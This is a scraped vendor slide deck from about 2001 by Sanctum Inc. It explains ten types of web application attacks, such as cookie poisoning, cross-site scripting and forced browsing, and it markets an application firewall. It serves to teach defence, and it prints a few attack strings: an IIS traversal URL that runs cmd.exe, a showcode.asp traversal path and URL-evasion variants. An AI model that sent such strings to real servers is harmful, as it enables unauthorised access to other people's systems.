Docstoc

The Problem and the Solution

Document Sample
The Problem and the Solution Powered By Docstoc
					Securing Web Applications and Data Flow
              Presented by:
               Steve Pettit
           Systems Engineering
              Sanctum Inc.
  Overview

• The Web Application Layer Threats

• Why the Problems Exists
    – Landscape
    – Anatomy of a Web Application Server


• The failed solutions
    – Manual patching and code review not fast enough
    – Traditional Solutions Fail (FW / IDS / ACLs / OS Hardening…)


• Application Firewalling as a solution
Recent News




              Code Red:Alive
              again and Kicking
                  — Zdnet Aug 1, 2001
97% of Sites Are Vulnerable


            31%
  Full Control & Access to Information              25% Privacy Breach
                                                             4% Minor Breach
                                                                            7%
                                                                       Modify Information


7% Hijack
Transaction

                                                                                25%
                                                                             Privacy Breach


                      23%
                                                 3%
               e-Shoplifting
                                                 Delete Web Site


                  The results of over 300 AppAudits conducted with AppScan
The Business Problem -
Web Application Hacking


    Type A                           Type B
    Stealing Company Assets          Falsifying B2B or B2C
                                     Buy/Sell Transactions




    Type C                           Type D
    Obtaining Customer Information   Defacing a site
Type A


                Type A
                Stealing Company Assets




         Hackers can access corporate assets,
             from strategic documents and
            personnel records to intellectual
         property, patents and business secrets
Type B


                Type B
                Falsifying B2B or B2C
                Buy/Sell Transactions




          Hackers can alter the price of your
         goods and services, effectively buying
            products for next to nothing, or
                changing your content.
Type C


                 Type C
                Obtaining Customer Information




          Hackers can access your customers’
         most sensitive information, from credit
           card numbers and financial data to
         medical records and private messages.
Type D


               Type D
               Defacing a site




         Hackers can turn your applications
         against you to deface, debilitate or
            totally shut down your site.
    Ten Categories of Application Hacks

•   Hidden Field Manipulation - eShoplifting
•   Parameter Tampering - access OS or sensitive data; fraud

•   Backdoors and Debug Options – access code/application as developer or admin
•   Cookie Poisoning - identity theft, illegal transactions

•   Stealth Commanding - access OS or control application at OS level, site defacement
•   Forceful Browsing - access sensitive data

•   Cross-Site Scripting - server-side exploitation, access sensitive data; eHijacking

•   Buffer Overflow - access sensitive data, or crash site/application
•   3rd-Party Misconfiguration - access OS or data

•   Published/Known Vulnerabilities- access OS; crash site; access sensitive data
  Hidden Field Manipulation


• Vulnerability explanation:
    The application sends data to the clients using a hidden field in a form.
      Modifying the hidden form field damages the data returning to the web
      application


• Why Hidden Field Manipulation:
    Passing hidden fields is a simple and efficient way to pass information from
      one part of the application to another (or between two applications)
      without the use of complex backend systems.


• As a result of this manipulation :
    The application acts according to the changed information and not
      according to the original data
Hidden Field Manipulation - Example
Hidden Field Manipulation - Example
Hidden Field Manipulation - Example
Hidden Field Manipulation - Example
  Cookie Poisoning


• Vulnerability explanation:
    The session information contained within the cookie is changed to a
      different value causing the application to shift to the new session ID.


• Why Cookie Poisoning:
    Some session IDs are not-secure e.g. not encrypted or weakly encrypted
      or hashed. This is due to lack of cryptographic expertise of the
      developers.


• As a result of this manipulation :
    Hackers can assume the user’s identity and have access to that user’s
      information – identity theft/impersonation
Cookie Poisoning - Example
Cookie Poisoning - Example
Cookie Poisoning - Example
Cookie Poisoning - Example
  Backdoor & Debug options

• Vulnerability explanation:
    The application has hidden debug options that can be activated by
       sending a specific parameter or sequence

• Why Backdoor and Debug options:
    1. Leaving debug options in the code enables developers to find and fix
       bugs faster
    2. Developers leave backdoors as a way of guaranteeing their access to
       the system

• As a result of this manipulation :
    Activation of the hidden debug option allows the hacker to have extreme
       access to the application (usually unlimited).
Backdoor & Debug options - Example
Backdoor & Debug options - Example
Backdoor & Debug options - Example
  Application Buffer Overflow


• Vulnerability explanation:
    Exploiting a flaw in a form to overload the server with excess information -
      sending more characters will cause it to misbehave


• Why Application Buffer Overflow:
    The application does not check the number of characters


• As a result of this manipulation :
    The application crashes and in many cases causes the whole site to shut
      down (DoS). In other cases, the application executes the code received
      as the input
Application Buffer Overflow- Example
Application Buffer Overflow- Example
Application Buffer Overflow- Example
Application Buffer Overflow- Example
Application Buffer Overflow- Example
  Stealth Commanding

• Vulnerability explanation:
    Concealing dangerous commands via a Trojan horse with the intent to run
      malicious or unauthorized code that is damaging to the site.


• Why Stealth Commanding:
   Applications tend to use the content received from a field to evaluate a new
   command. However, they assume that the content is only data and not
   executable code.


• As a result of this manipulation :
    The hacker can perform any command on the web-server, including
      complete shut down, defacement, or access to all information
Stealth Commanding - Example
Stealth Commanding - Example
  Known Vulnerabilities

• Vulnerability explanation:
    Some technology used in sites have inherent weaknesses that a persistent
      hacker, or a hacker with automated scanning tools, can exploit easily.
      Users are dependent on patches from the developer. After discovered
      in one site they can be used in all the sites using the same component

• Why Known Vulnerabilities:
    Third party vendors have bugs (Microsoft IIS etc). Since their products
      appear in many sites they are examined thoroughly by a large number
      of hackers

• As a result of this manipulation:
    Once a bug is found, large parts of the internet are scanned and exploited.
      The actual result varies according to the vulnerability type but ability to
      gain the administrators’ passwords and take control of the site is not
      unusual!
Known Vulnerabilities - Example




                            /msadc/..à?¯..à?¯..à?¯..à?¯..
                     /winnt/system32/cmd.exe?/c+dir+c:
  3rd Party Misconfigurations


• Vulnerability explanation:
    A misconfiquration, or human error during install of 3rd party software can
      cause default passwords or settings unchanged – open invitation for
      attack


• Why 3rd party misconfiqurations:
    Occurs during the installation and maintenance of the 3rd party
      application


• As a result of this manipulation :
    Through a confiquration error a hacker could create a new database that
      rendors the existing one unusable by the site
3rd Party Misconfiguration - Example




        /msadc/Samples/SELECTOR/showcode.asp?
        source=/msadc/Samples/../../../../..
  Cross Site Scripting


• Vulnerability explanation:
    A third party creates a link (or sends an email) that as part of the URL
       contains a parameter with a script – once the user connects, the site
       runs this script


• Why Cross Site Scripting:
    Many parameters are implanted within the HTML of following responses,
      while not checking their content for scripts.


• As a result of this manipulation:
    “Virtual hijacking” of the session. Any information flowing between the
       legitimate user and site can be manipulated or transmitted to the evil
       3rd party.
Cross Site Scripting - Example

                        Press this link to get to your bank
Underlying link: http://www.mybank.com?a=<evil javascript>
The JavaScript program collects and sends user names and passwords




                           1
                                                             Username
                                                    3
                                                             Password
                            2



                                Enter your login information
  Parameter Tampering

• Vulnerability explanation:
    Parameters are used to obtain information from the client. This
      information can be changed in a site’s URL parameter


• Why Parameter Tampering:
    Developers focus on the legal values of parameters and how they should
      be utilized. Little if any attention is given to the incorrect values


• As a result of this manipulation :
    The application can perform a function that was not intended by its
      developer like giving access to customer information
Parameter Tampering - Example
Parameter Tampering - Example
  Forceful Browsing

• Vulnerability explanation:
    By “guessing” the names of files and directories the hacker can view them
       without going through the business logic leading to those objects.


• Why forceful browsing:
    1. Default files are left during the installation process
    2. New files that should not be exposed and old files which should be
       removed are left (outside the normal flow) by mistake


• As a result of this manipulation :
    Content (log files, administration facilities, application source code) is
      revealed due to file and directory access
Forceful Browsing - Example
Forceful Browsing - Example
Forceful Browsing - Example
         The Four Levels of Web Security


           1                2                  3                    4

                                                                       Web
               Desktop          Transport          Network
                                                                    Applications




Security       Antivirus        Encryption         Firewall             Manual Patching
Threat         Disruption       Interception       Illegal Access       Perversion
    Desktop Level

•   AntiVirus Software
    – Symantec
    – Network Associates
    – Trend Micro
•   Personal Firewalls                1
    – Symantec
    – Network Ice
    – ZoneAlarm                           Desktop




                           Security       Antivirus
                           Threat         Disruption
    Transport Level

• Encryption
     – Virtual Private Network (VPN)
        • Entrust, Cisco, CheckPoint
     – Secure Socket Layer (SSL)
        • Netscape
•   Authentication                                2
     – PKI
        • Entrust, Verisign                           Transport




                                       Security       Encryption
                                       Threat         Interception
    Network Level

•   Firewalls
    – CheckPoint, Cisco, WatchGuard
• Intrusion Detection
    – ISS, Cisco, CA
•   Vulnerability Scanners                       3
    – NAI, ISS.

                                                     Network




                                      Security       Firewall
                                      Threat         Illegal Access
    Web Application Level

    The Inner Sanctum:
•   Content
     – Static, Dynamic (application services)
•   Data
     – Customer, Corporate, …                              4
•   In-house developed code
•   3rd party components                                      Web
                                                           Applications
     – Web server, App server, DB server, OS, …


       75% of the hacks occur at the
      application level (Gartner Group)         Security       Manual Patching
                                                Threat         Web Perversion
  Why the Problem Exists and How to Fix It

• Why
   –   Anatomy of a Web Application
   –   Web Application Message Flow
   –   Organization Issues with Managing a Web Application
   –   Technical Threats for Web Application Components


• How to Fix it
   – Need for Application Firewall
   – Criteria of an Application Firewall
   – Application Firewall as a Solution
  Anatomy of a Web application

• Web Server - Server Software (iPlanet, Apache, IIS)

• User Interface Code - Site look and Feel (HTML, JavaScript, ActiveX)

• Front End System - Scripting Languages (ColdFusion, CGIs)

• Back End System – Business Driver (MainFrame, Peoplesoft, SAP, ERP)

• Database - Oracle, DB2

• Data - Target of the site
Web Application Message Flow


   Data                                      •   The business logic that
                                                 enables:
   Database                                       –   User’s interaction with the Web site
                                                  –   Transacting/interfacing with back-end
                                                      data systems (databases, CRM, ERP
   Backend Application                                etc)
                                             •   In the form of:
   Frontend Application                           –   3rd party packaged software; i.e. web
                                                      server, shopping cart software,
                                                      personalization engines etc.
   User Interface Code
                                                  –   Code developed in-house / web
                                                      builder / system integrator
   Web Server



                          User Input
                         HTML/HTTP

                          Browser

                Input and Output flow through each layer of the
                                  application.
              A break in any layer breaks the whole application.
    Web Application Organizational Issues

•   Many organizations are involved with creating and supporting a Web
    applications at the different layers, with much overlap
             –   Marketing
             –   Application Managers
             –   Application Developers
             –   Database Administrators
             –   Database Developers
             –   Operations Support
             –   Network Administrators
             –   System Administrators
             –   Vendor


•   Who is the real owner?

•   Who is responsible for support?

•   Who is responsible to maintain code?

•   Who owns the data?
Web Application Organizational Issues
                           User       Web      Frontend      Backend
                         Interface   Server   Application   Application   DataBase   DATA

 MARKETING

 APPLICATION MANAGER


 APPLICATION DEVELPER

  DATABSE ADMIN

  DATABASE DEVELOPER

 OPERATIONS SUPPORT

 NETWORK ADMIN

 SYSTEM ADMIN

 VENDOR

 CUSTOMER


             Developing and Supporting a Web Application requires
                   close interdepartmental communication.
  Threats at the Application Layers

• Each layer of the application has its own unique vulnerabilities

• A vulnerability fixed at one layer may still be exploitable at
   another layer

• An exploit at any layer of the application effects the integrity for
   the entire application
    – Application DoS
    – Compromised Security
Application Layer Threats

                                 User       Web      Frontend      Backend
                               Interface   Server   Application   Application   DataBase

  HIDDEN MANIPULATION

  COOKIE POISONING

  BACKDOOR & DEBUG OPTIONS

  BUFFER OVERFLOW

  STEALTH COMMANDING

  3RD PARTY MISCONFIGURATION

  KNOWN VULNERABILITIES

  PARAMETER TAMPERING

  CROSS SITE SCRIPTING

  FORCEFUL BROWSING
Web Application Message Flow
Valid and Invalid Input


                                                      Invalid Data can
   Data                                              exploit weakness in
                                                       the application
   Database
                                                       acting as escape
                                                      holes resulting in
   Backend Application
                                                           access to
   Frontend Application
                                                        unauthorized
                                                        accounts, O/S
   User Interface Code                               Network, sensitive
                                                     data and may even
   Web Server                                            result in an
                                                     Application Denial
                         Valid Input Invalid Input        of Service
                         HTML/HTTP HTML/HTTP

                                Browser

                  Without any protection,
holes and backdoors exist at every layer waiting to be exploited
Targeting Flaws in Web Applications




Browser


           Common Security         Web Server
           Approaches
                                   Application
     Invalid HTTP/HTML       Application Impurity
     Web Request             (Based on 10 types of Hacks)
                             Internal / External Illegal Target
     Valid HTTP/HTML
     Web Request             Legal Application Data Target
How Safe is Application after Removing
Known Bugs




Browser


           Common Security         Web Server
           Approaches
                                   Application
     Invalid HTTP/HTML       Application Impurity
     Web Request             (Based on 10 types of Hacks)
                             Internal / External Illegal Target
     Valid HTTP/HTML
     Web Request             Legal Application Data Target
Most Browser Attacks Flow Through Standard Security,
Only a Few are Blocked




                                               Web Server
  Firewall
      Intrusion Detection
                                              Application Exploit
             Authentication
                                              Unblocked HTTP/HTML Attack
                     Encryption
                                              Blocked HTTP/HTML Attack
                        Access Control
                                Hardened OS
  Why Common Security Tools Fail at
  Stopping Application Level Attacks

• They are good at addressing issues around the application
   – Application Access
   – Login and Authentication
   – Encryption


• But simply are NOT designed to address application layer
  attacks
   – Do not Operate at the Application Layer
      • Application Messaging (Parameter passing)
   – Do not Understand Content Logic of the Application
      • Is it a good or bad request?
    Common Solution Approaches

    Categories

•   Hardened Servers
•   Host Based Intrusion Detection
•   Access Control
•   Content Integrity
•   Total Application Shielding
Solution Approaches
Basic site architecture
    Hardened Servers
    OS and service level hardening of the Web servers
•   Argus – PitBull
•   HP – Virtual Vault




               Does not operate at the Application Layer
    Host Based Intrusion Detection
    Attack pattern identification, and OS-level enforcement
•   entercept




                Does not understand the Application Logic
    Rule-based authentication and
    authorization

•   Netegrity – SiteMinder
•   IBM – Tivoli Policy Director
•   Internet Dynamics – Conclave
•   Ubizen – MultiSecure Suite




            Does not understand the Application Logic
    Content Integrity

•   Gilian – G-Server
•   WatchGuard – ServerLock (Quiave)




             Does not address Application Logic Threats
Total Application Shielding
Sanctum – AppShield




            Preventing misuse of the application
             and all its underlying components
  How to Shield an Application?


• Install an Application Firewall
    – A tool that stops Web level attacks from reaching the Web server
      thereby protecting the Web server, it’s application layers and all the
      resources it uses.
    Requirements for an Application Firewall

•   Functions at the application level - ISO model layer 7
     –   Understands inbound and outbound requests
     –   Block invalid requests without terminating entire user session

•   Designed to recognize & protect against application threats
     –   Signature & Non-signature attacks

•   Dynamic and Accurate
     –   Understands application logic (Web perversion)

•   Architects with the Application
     –   Compatible with Web Application technologies

•   Works in Real Time
     –   Addresses threats before they reach the server

•   Provide Application Level Forensics
     –   Logging & Altering

•   Single Point of Administration
     –   One solution to protect all application components
  Some Variations on a Specific Application
  Layer Attack

• URL Forceful Browsing attempts on “samples/admin”
       •   Direct Request            “samples/admin”
       •   Delimiter Padding         “samples///admin”
       •   Absolute Pathing          “samples/./admin“
       •   URL Encoding              "%2fsamples/admin“
       •   Relative Pathing          “samples/fakedir/../admin“
       •   DOS Syntax                “samples\admin”
       •   Null Method               "GET%00/samples/admin“
       •   others …


     Security tools need to operate at Layer 7 to see the attacks
                                 &
    need to understand the application logic to block the attacks
 Comparison based on Application Needs
 & Application Firewall Criteria
                                         Intrusion     Access                                           Application
                        Authentication   Detection     Control   Firewall   Encryption   Hardened OS    Firewalling

APP. BUFFER OVERFLOW

COOKIE POISONING

CROSS SITE SCRIPTING

HIDDEN MANIPULATION

STEALTH COMMANDING

3RD PARTY MISCONFIG.

KNOWN VULNERABILITIES

PARAMETER TAMPERING

BACKDOORS & DEBUG OPT.

FORCEFUL BROWSING



                                                     Protected                             Partial Protection
Application Firewall Blocks Browser
Attacks Missed by Other Tools




                                               Web Server
  Firewall
      Intrusion Detection                   Application Firewall
             Authentication
                     Encryption                  Application Exploit
                         Access Control          Unblocked HTTP/HTML Attack
                              Hardened OS        Blocked HTTP/HTML Attack
Application Firewall Prevents Impurities
from Being Exploited


                                 X




 Browser
                                 X




           Common Security                       Web Server
             Approaches      Application FW
                                                 Application

      Invalid HTTP/HTML              Application Impurity
      Web Request                    (Based on 10 types of Hacks)
                                     Internal / External Illegal Target
      Valid HTTP/HTML
      Web Request                    Legal Application Data Target
Block Threats on Input Stream Protects
Web Applications from Exploitation


      Data                                                       Sensitive Data
                                                                 and Resources
      Database                                                     remain safe
                                                                     even if
     Backend Application
                                                                  exploits exist
     Frontend Application                                             in the
                                                                   application
     User Interface Code


     Web Server

                                                  Block Invalid Input at the Entry Point.
                      Valid Input Invalid Input   This protects the Web Application.
                      HTML/HTTP HTML/HTTP

                             Browser

  If threats can’t reach the holes and backdoors at each layer
                    then they can’t be exploited
    Post Script
    Web Worms & Application Firewalling

•   Web Worms are autonomous code that propagating themselves by
    seeking out Web servers and infecting them

•   Web Worms rely on specific exploits to enter a site
     – Ten Types of Web Hacks


•   Companies have spent Billions recovering from Web Worm damage

•   Some well known Web Worms
     –   SadMind – Solaris and IIS - (5/01)
     –   Code Red – IIS - (7/01)
     –   Code Red II – IIS - (8/01)
     –   Nimda – IIS - (9/01)
     –   Nimda A-E – (10/01)
     –   More are coming …
Code Red Stopped in its tracks from
Infecting Web Server
Nimda Stopped in its tracks from Infecting
Web Server
  Stop the Worms before they Stop You

• Web Worms automate the attacks that hackers use

• Web Worms spread at an astronomical rate

• Recovering from Web Worm damage cost time and money

• Stopping the infection stops the spreading

• Application Firewalling provides automatic default protection
   from Web Worms
  Summary

• Anyone with a browser can launch application level attacks

• The complexity of a Web Application is what creates
   weaknesses in application security

• Common Security Tools Cannot Address Application Level
   Attacks

• Web Worms rely on Application vulnerabilities to enter a site

• Application Firewalling is the only solution to block Browser and
   Automated (worms) attacks against a Web Application
  SAVE
  GET
YOUR SITE
      Steve Pettit
     817- 416-1539
spettit@sanctuminc.com
     Sanctum Inc.
2901 Tasman Dr. Ste 205
 Santa Clara, CA 95054

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:27
posted:6/4/2011
language:English
pages:84